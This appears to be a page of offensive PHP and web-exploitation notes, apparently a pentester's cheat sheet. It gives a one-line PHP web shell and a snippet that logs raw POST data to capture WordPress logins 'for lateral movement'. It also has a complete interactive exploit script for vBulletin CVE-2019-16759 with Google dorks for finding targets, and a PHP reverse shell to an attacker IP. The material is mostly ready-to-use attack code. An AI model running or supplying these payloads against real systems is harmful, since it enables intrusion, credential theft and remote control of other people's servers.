// See which functions are enabled
<?php
print_r(preg_grep("/^(system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source)$/", get_defined_functions(TRUE)["internal"]));
?>// Some code
<?php system($_GET['cmd']);?>// get all Sessions (to use in cookie PHPSESSID
<?php
print_r(scandir(session_save_path()));
?>
Last updated
// capturing wp creds for lateral movement
// to grab login etc insert before wp user page
<?php file_put_contents('log.txt',file_get_contents('php://input')); ?>// PhpMailer RCE in WP
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
// Vbulletin RCE - CVE-2019-16759 (vBulletin RCE)
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print(r.text)
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception as e:
sys.exit(str(e))
// Some code
echo 'bGludXhoaW50LmNvbQo=' | base64 --decode// Some code
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>// Code
<?php
$myfile = fopen("webdictionary.txt", "r") or die("Unable to open file!");
echo fread($myfile,filesize("webdictionary.txt"));
fclose($myfile);
?>
<?php
$dir = ".";
$files1 = scandir($dir);
$files2 = scandir($dir,1);
print_r($files1);
print_r($files2);
?>